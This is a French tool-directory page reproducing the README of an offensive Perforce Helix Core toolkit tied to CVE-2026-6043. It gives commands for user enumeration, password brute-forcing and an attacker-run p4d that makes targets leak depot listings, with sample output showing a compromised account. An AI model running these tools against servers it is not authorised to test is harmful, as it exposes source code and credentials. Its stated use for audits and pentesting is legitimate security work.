Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
p4wned — Recherche et outils de sécurité Perforce - CVE-2026-6043 | Kitploit
Outils/GitHubGitHub/flyingllama87/p4wned
ReconnaissanceScanners de VulnérabilitésScanners de Vulnérabilités WebFrameworks d'ExploitationAttaques de Mots de PasseExploitationCollecte d'InformationsTests d'IntrusionMauvaise Configuration
GitHubflyingllama87/p4wned

p4wned

Recherche et outils de sécurité Perforce - CVE-2026-6043

216il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôtSite web
Partager

P4WNED (CVE-2026-6043)

Outils de recherche en sécurité Perforce (Helix Core) et templates Nuclei.

Article de recherche : https://morganrobertson.net/p4wned/

Veuillez lire ce qui précède pour tous les détails.

Cibles autorisées uniquement. Utilisez sur vos propres serveurs ou avec une autorisation écrite explicite.

Public visé : administrateurs de serveurs Perforce, testeurs d'intrusion, ingénieurs en sécurité

Mise à jour de mai 2026 : Perforce 2026.1 a été publié. Cette version est livrée avec des paramètres sécurisés par défaut ! Très heureux de voir cette version protéger la propriété intellectuelle des développeurs. Lire plus ici.

Remarque : Ces outils recherchent les mauvaises configurations résultant de CVE-2026-6043.


Prérequis

OutilNécessite
p4wned.pyPython 3, binaire CLI p4 (voir ci-dessous)
p4ghost.pyPython 3, binaire CLI p4, instance p4d locale (voir configuration ci-dessous)
p4-auth-hammerg++, API C++ Perforce, OpenSSL 1.1.1 (voir p4-auth-hammer/README.md)
Outils JavaScriptNode.js (aucune dépendance externe)
Templates NucleiNuclei v3+
Modules MetasploitMetasploit Framework

Acquisition du binaire p4 (requis par p4wned.py et p4ghost.py) :

# Subject to Perforce terms of use: https://www.perforce.com/legal
wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
chmod +x p4

Contexte

Les serveurs Perforce exposent un protocole TCP binaire personnalisé (port par défaut 1666). De nombreuses installations sont livrées avec des paramètres par défaut non sécurisés — listage des utilisateurs sans authentification, divulgation d'informations du serveur, dépôts distants accessibles, absence d'exigence de mot de passe et absence de limitation de débit sur les tentatives de connexion. Tous les outils ici exploitent ces défauts sans nécessiter d'identifiants.


Outils

p4wned.py — Scanner de sécurité complet

Le scanner principal. Utilise le binaire CLI p4 pour énumérer les utilisateurs, tester les identifiants, lister les dépôts et produire un rapport.

python3 p4wned.py [-brute] [-audit] [-parallel N]

Options :

IndicateurDescription
-bruteActive le mode force brute — teste les mots de passe contre tous les comptes utilisateurs découverts
-auditMode d'audit approfondi — continue de tester tous les utilisateurs même après avoir trouvé une vulnérabilité
-parallel NNombre de tentatives de mot de passe en parallèle (par défaut : 1)

Configuration (éditer en haut du script) :

VariableDescription
INPUT_FILEListe des cibles (ip:port, une par ligne) — par défaut perforce-servers.txt
P4_CMDChemin vers le binaire p4 — par défaut ./p4
TOP_PASSWORDS_FILEWordlist pour la force brute — par défaut top-passwords.txt
KNOWN_CREDS_FILEPaires d'identifiants connues à essayer en premier
REPORT_FILEChemin du rapport de sortie

Ce qu'il fait :

  • Détecte le mode serveur ASCII ou unicode
  • Énumère les utilisateurs (si run.users.authorize=0)
  • Teste les mots de passe vides et les identifiants connus/courants
  • Liste les noms des dépôts et échantillonne les chemins de fichiers récents
  • Vérifie l'appartenance au groupe super sur les comptes compromis
  • Génère un rapport texte structuré

Sortie console :

$ python3 p4wned.py

                   ___ _  _  __    __    __  __  ___ 
                  / _ \ || |/ / /\ \ \/\ \ \/__\/   \
                 / /_)/ || |\ \/  \/ /  \/ /_\ / /\ /
                / ___/|__   _\  /\  / /\  //__/ /_// 
                \/       |_|  \/  \/\_\ \/\__/___,'  

P4WNED - 0wning P4 servers via shit security defaults since Y2K+25

 · Sniffs out user accounts, blank passwords, weak creds, and dumb settings.
 · Confirms depots access and those juicy "super" user accounts.
 · Drops a tidy report so you can fix the mess before the Skids arrive

Authorised targets only, brotendo. Use on your own servers or at your own risk.
==============================================================================


=== Processing: 192.0.2.10:1666 (perforce.example-studio.com) ===

[INFO] Testing user 'super' for security issues...
[INFO] User 'super' does not exist.

[INFO] Users listing accessible: build, designer1, jsmith, lead_prog, svc_build

[INFO] Testing user 'build' for security issues...
[INFO] Testing user 'designer1' for security issues...
[INFO] Testing user 'jsmith' for security issues...
[INFO] Testing user 'lead_prog' for security issues...
[INFO] Testing user 'svc_build' for security issues...

[INFO] Added new credential for 192.0.2.10:1666: user='svc_build', password='None'
[INFO] Saving updated credentials after finding valid credentials for svc_build on 192.0.2.10:1666

[INFO] Report saved to perforce-report-p4wned-1775436520.txt

Fichier de rapport (perforce-report-p4wned-*.txt) :

Perforce Security Scan Report

Server: 192.0.2.10:1666 (perforce.example-studio.com)
  Status: Insecure
  Note: Insecure via user 'svc_build' (no password)

  == Depots ==
Depot depot 2025/11/03 local depot/... 'Default depot'
Depot assets 2024/08/19 local assets/... 'Asset depot'

  == Last 10 Changes ==
Change 1047 on 2025/11/03 14:22:11 by lead_prog@DESKTOP-BUILD01

        Merge branch feature/ai-pathfinding

Change 1046 on 2025/11/03 09:44:38 by designer1@DESKTOP-ART02

        Updated character rig exports

  == Depot Details ==

  Depot: depot
    -- Root Directories --
    //depot/Source
    //depot/Content
    //depot/Config
    This depot is a non-Unreal Engine Depot.

------------------------------------------------------------

Summary Report

Server: 192.0.2.10:1666 - Insecure - Note: Insecure via user 'svc_build' (no password)

p4ghost.py — Scanner de dépôt distant

Teste l'accès non authentifié aux dépôts distants via l'utilisateur caché remote. L'exploitation fonctionne en exécutant une instance p4d locale contrôlée par l'attaquant — le serveur cible se connecte en retour dans le cadre du protocole serveur à serveur, divulguant ainsi la liste des fichiers du dépôt.

Configuration (une fois) :

# Subject to Perforce terms of use: https://www.perforce.com/legal
wget https://ftp.perforce.com/perforce/r24.2/bin.linux26x86_64/p4d
wget https://ftp.perforce.com/perforce/r25.2/bin.linux26x86_64/p4
chmod +x p4d p4

# Start a plain ASCII p4d on port 1818 (used as the attacker's server)
mkdir p4root_attacker
./p4d -r ./p4root_attacker -p 1818 -d

# Start a unicode p4d on a separate port (1819) for unicode targets
mkdir p4root_attacker_unicode
./p4d -r ./p4root_attacker_unicode -xi   # convert to unicode mode
./p4d -r ./p4root_attacker_unicode -p 1819 -d
python3 p4ghost.py <input_file> [-skipnolicense] [-report FILE] [-p4cmd PATH]
                   [-unicodeport PORT] [-nonunicodeport PORT] [-timeout SECS]
# Example invocation using the local attacker servers above
python3 p4ghost.py targets.txt -nonunicodeport 1818 -unicodeport 1819

Arguments :

IndicateurDescription
input_fileListe des cibles (ip:port, une par ligne)
-skipnolicenseIgnorer les serveurs qui renvoient Server license: none
-report FILEChemin du rapport de sortie
-p4cmd PATHChemin vers le binaire p4 (par défaut ./p4)
-unicodeport PORTPort p4d unicode local à utiliser comme serveur de l'attaquant
-nonunicodeport PORTPort p4d non-unicode local
-timeout SECSDélai d'attente des commandes
Télécharger l’outil